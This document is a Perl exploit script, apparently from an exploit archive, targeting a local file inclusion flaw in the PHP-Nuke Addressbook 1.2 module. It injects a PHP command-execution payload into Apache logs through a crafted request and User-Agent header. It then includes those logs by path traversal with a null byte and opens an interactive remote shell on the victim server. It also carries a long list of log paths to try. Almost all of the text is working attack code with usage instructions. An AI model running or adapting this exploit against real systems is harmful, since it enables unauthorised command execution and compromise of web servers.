PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit

                                                #!Perl
#
#PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit
#
#Vendor: http://www.sb-websoft.com/index.php?name=CmodsDownload&file=index&req=getit&lid=14
#
#Vulnerable Code: require_once(\"modules/$module_name/include/func.inc.php\");
#
#Coded by bd0rk || SOH-Crew
#
#Greetz: str0ke, TheJT, saint, CodeR, rgod, Kacper
#

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);

if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{
print&nbsp;\"
PHP-Nuke&nbsp;Module&nbsp;Addressbook&nbsp;1.2&nbsp;Local&nbsp;File&nbsp;Inclusion&nbsp;Exploit
###############################################################
Usage:&nbsp;exploit.pl&nbsp;[victim]&nbsp;/modules/Addressbook/&nbsp;[apachepath]
###############################################################
\";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print&nbsp;\"Code&nbsp;is&nbsp;injecting&nbsp;in&nbsp;logfiles...
\";
$CODE=\"<?php&nbsp;ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\";
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";
print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.$CODE.\"&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"user-Agent:&nbsp;\".$CODE.\"
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";
close($socket);
print&nbsp;\"Write&nbsp;END&nbsp;to&nbsp;exit!
\";
print&nbsp;\"If&nbsp;not&nbsp;working&nbsp;try&nbsp;another&nbsp;apache&nbsp;path

\";

print&nbsp;\"[shell]&nbsp;\";$cmd&nbsp;=&nbsp;<STDIN>;

while($cmd&nbsp;!~&nbsp;\"END\")&nbsp;{
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";

#now&nbsp;include&nbsp;parameter

print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.\"addressbook.php?module_name=\".$apache[$apachepath].\"%00&cmd=$cmd&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/*
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";

while&nbsp;($raspuns&nbsp;=&nbsp;<$socket>)
{

print&nbsp;$raspuns;
}

print&nbsp;\"[shell]&nbsp;\";
$cmd&nbsp;=&nbsp;<STDIN>;
}

&nbsp;